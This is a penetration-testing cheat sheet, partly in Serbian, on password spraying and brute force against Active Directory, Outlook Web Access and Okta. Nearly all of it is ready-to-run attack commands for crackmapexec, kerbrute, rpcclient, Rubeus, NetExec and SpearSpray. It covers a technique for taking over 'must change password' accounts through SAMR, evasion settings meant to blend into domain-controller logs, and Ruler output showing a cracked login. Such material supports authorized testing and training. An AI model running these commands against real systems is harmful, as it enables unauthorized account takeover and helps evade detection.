Password Spraying / Brute Force

Reading time: 9 minutes

Password Spraying

Kada pronađete nekoliko valid usernames možete pokušati najčešće common passwords (imajte na umu password policy okruženja) sa svakim od otkrivenih korisnika.
Po default minimalna password length je 7.

Liste common usernames takođe mogu biti korisne: https://github.com/insidetrust/statistically-likely-usernames

Imajte na umu da biste mogli lockout some accounts if you try several wrong passwords (po default više od 10).

Get password policy

Ako imate user credentials ili shell kao domain user možete get the password policy with:

# From Linux
crackmapexec <IP> -u 'user' -p 'password' --pass-pol

enum4linux -u 'username' -p 'password' -P <IP>

rpcclient -U "" -N 10.10.10.10;
rpcclient $>querydominfo

ldapsearch -h 10.10.10.10 -x -b "DC=DOMAIN_NAME,DC=LOCAL" -s sub "*" | grep -m 1 -B 10 pwdHistoryLength

# From Windows
net accounts

(Get-DomainPolicy)."SystemAccess" #From powerview

Eksploatacija sa Linuxa (ili svih)

• Korišćenje crackmapexec:

crackmapexec smb <IP> -u users.txt -p passwords.txt
# Local Auth Spray (once you found some local admin pass or hash)
## --local-auth flag indicate to only try 1 time per machine
crackmapexec smb --local-auth 10.10.10.10/23 -u administrator -H 10298e182387f9cab376ecd08491764a0 | grep +

• Korišćenje kerbrute (Go)

# Password Spraying
./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com [--dc 10.10.10.10] domain_users.txt Password123
# Brute-Force
./kerbrute_linux_amd64 bruteuser -d lab.ropnop.com [--dc 10.10.10.10] passwords.lst thoffman

• spray (možete navesti broj pokušaja da biste izbegli zaključavanje naloga):

spray.sh -smb <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes> <DOMAIN>

• Korišćenje kerbrute (python) - NIJE PREPORUČENO, PONEKAD NE RADI

python kerbrute.py -domain jurassic.park -users users.txt -passwords passwords.txt -outputfile jurassic_passwords.txt
python kerbrute.py -domain jurassic.park -users users.txt -password Password123 -outputfile jurassic_passwords.txt

• Korišćenjem modula scanner/smb/smb_login u okviru Metasploit:

• Korišćenjem rpcclient:

# https://www.blackhillsinfosec.com/password-spraying-other-fun-with-rpcclient/
for u in $(cat users.txt); do
rpcclient -U "$u%Welcome1" -c "getusername;quit" 10.10.10.10 | grep Authority;
done

Sa Windowsa

• Sa Rubeus verzijom koja sadrži brute module:

# with a list of users
.\Rubeus.exe brute /users:<users_file> /passwords:<passwords_file> /domain:<domain_name> /outfile:<output_file>

# check passwords for all users in current domain
.\Rubeus.exe brute /passwords:<passwords_file> /outfile:<output_file>

• Uz Invoke-DomainPasswordSpray (Podrazumevano može da generiše korisnike iz domena i preuzme politiku lozinki iz domena i ograniči pokušaje u skladu sa njom):

Invoke-DomainPasswordSpray -UserList .\users.txt -Password 123456 -Verbose

• Sa Invoke-SprayEmptyPassword.ps1

Invoke-SprayEmptyPassword

Identifikujte i preuzmite naloge "Password must change at next logon" (SAMR)

Nisko-bučna tehnika je izvršiti password spraying sa neškodljivom/praznom lozinkom i detektovati naloge koji vraćaju STATUS_PASSWORD_MUST_CHANGE, što ukazuje da je lozinka prisilno istekla i može se promeniti bez poznavanja stare.

Workflow:

• Enumerišite korisnike (RID brute via SAMR) da biste napravili listu ciljeva:

rpcclient enumeration

# NetExec (null/guest) + RID brute to harvest users
netexec smb <dc_fqdn> -u '' -p '' --rid-brute | awk -F'\\\\| ' '/SidTypeUser/ {print $3}' > users.txt

• Spray praznu password i nastavi sa hits kako bi uhvatio naloge koji moraju da promene pri sledećem logonu:

# Will show valid, lockout, and STATUS_PASSWORD_MUST_CHANGE among results
netexec smb <DC.FQDN> -u users.txt -p '' --continue-on-success

• Za svaki hit, promenite lozinku preko SAMR-a pomoću modula NetExec (stara lozinka nije potrebna kada je "must change" postavljeno):

# Strong complexity to satisfy policy
env NEWPASS='P@ssw0rd!2025#' ; \
netexec smb <DC.FQDN> -u <User> -p '' -M change-password -o NEWPASS="$NEWPASS"

# Validate and retrieve domain password policy with the new creds
netexec smb <DC.FQDN> -u <User> -p "$NEWPASS" --pass-pol

Operativne napomene:

• Uverite se da je sat na vašem hostu sinhronizovan sa DC pre operacija zasnovanih na Kerberosu: sudo ntpdate <dc_fqdn>.
• A [+] without (Pwn3d!) u nekim modulima (npr., RDP/WinRM) znači da su creds validni, ali nalog nema prava za interaktivnu prijavu.

Brute Force

legba kerberos --target 127.0.0.1 --username admin --password wordlists/passwords.txt --kerberos-realm example.org

Kerberos pre-auth spraying with LDAP targeting and PSO-aware throttling (SpearSpray)

Kerberos pre-auth–based spraying smanjuje šum u odnosu na SMB/NTLM/LDAP bind pokušaje i bolje se uklapa u AD lockout politike. SpearSpray kombinuje LDAP-driven targeting, pattern engine i svest o politikama (domain policy + PSOs + badPwdCount buffer) da bi spray-ovao precizno i bezbedno. Takođe može označiti kompromitovane principe u Neo4j za BloodHound pathing.

Key ideas:

• LDAP user discovery with paging and LDAPS support, optionally using custom LDAP filters.
• Domain lockout policy + PSO-aware filtering to leave a configurable attempt buffer (threshold) and avoid locking users.
• Kerberos pre-auth validation using fast gssapi bindings (generates 4768/4771 on DCs instead of 4625).
• Pattern-based, per-user password generation using variables like names and temporal values derived from each user’s pwdLastSet.
• Throughput control with threads, jitter, and max requests per second.
• Optional Neo4j integration to mark owned users for BloodHound.

Basic usage and discovery:

# List available pattern variables
spearspray -l

# Basic run (LDAP bind over TCP/389)
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local

# LDAPS (TCP/636)
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local --ssl

Ciljanje i kontrola obrazaca:

# Custom LDAP filter (e.g., target specific OU/attributes)
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local \
-q "(&(objectCategory=person)(objectClass=user)(department=IT))"

# Use separators/suffixes and an org token consumed by patterns via {separator}/{suffix}/{extra}
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local -sep @-_ -suf !? -x ACME

Kontrole prikrivanja i bezbednosti:

# Control concurrency, add jitter, and cap request rate
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local -t 5 -j 3,5 --max-rps 10

# Leave N attempts in reserve before lockout (default threshold: 2)
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local -thr 2

Neo4j/BloodHound obogaćivanje:

spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local -nu neo4j -np bloodhound --uri bolt://localhost:7687

Pregled sistema obrazaca (patterns.txt):

# Example templates consuming per-user attributes and temporal context
{name}{separator}{year}{suffix}
{month_en}{separator}{short_year}{suffix}
{season_en}{separator}{year}{suffix}
{samaccountname}
{extra}{separator}{year}{suffix}

Dostupne varijable uključuju:

• {name}, {samaccountname}
• Vremenske vrednosti iz pwdLastSet svakog korisnika (ili whenCreated): {year}, {short_year}, {month_number}, {month_en}, {season_en}
• Pomoćne varijable za sastav i org token: {separator}, {suffix}, {extra}

Operativne napomene:

• Preporučljivo je upitovati PDC-emulator sa -dc da biste pročitali najpouzdanije badPwdCount i informacije vezane za politiku.
• Resetovanje badPwdCount se pokreće pri sledećem pokušaju nakon observation window; koristite threshold i timing da ostanete bezbedni.
• Kerberos pre-auth attempts se evidentiraju kao 4768/4771 u DC telemetry; koristite jitter i rate-limiting da se uklopite.

Savet: SpearSpray’s default LDAP page size is 200; adjust with -lps as needed.

Outlook Web Access

Postoji više alata za password spraying outlook.

• Sa MSF Owa_login
• Sa MSF Owa_ews_login
• Sa Ruler (pouzdan!)
• Sa DomainPasswordSpray (Powershell)
• Sa MailSniper (Powershell)

Da biste koristili bilo koji od ovih alata, potrebna vam je lista korisnika i lozinka ili mala lista lozinki za password spraying.

./ruler-linux64 --domain reel2.htb -k brute --users users.txt --passwords passwords.txt --delay 0 --verbose
[x] Failed: larsson:Summer2020
[x] Failed: cube0x0:Summer2020
[x] Failed: a.admin:Summer2020
[x] Failed: c.cube:Summer2020
[+] Success: s.svensson:Summer2020

Google

• https://github.com/ustayready/CredKing/blob/master/credking.py

Okta

• https://github.com/ustayready/CredKing/blob/master/credking.py
• https://github.com/Rhynorater/Okta-Password-Sprayer
• https://github.com/knavesec/CredMaster

Reference

• https://github.com/sikumy/spearspray
• https://github.com/TarlogicSecurity/kerbrute
• https://github.com/Greenwolf/Spray
• https://github.com/Hackndo/sprayhound
• https://github.com/login-securite/conpass
• https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-password-spraying
• https://www.ired.team/offensive-security/initial-access/password-spraying-outlook-web-access-remote-shell
• www.blackhillsinfosec.com/?p=5296
• https://hunter2.gitbook.io/darthsidious/initial-access/password-spraying
• HTB Sendai – 0xdf: from spray to gMSA to DA/SYSTEM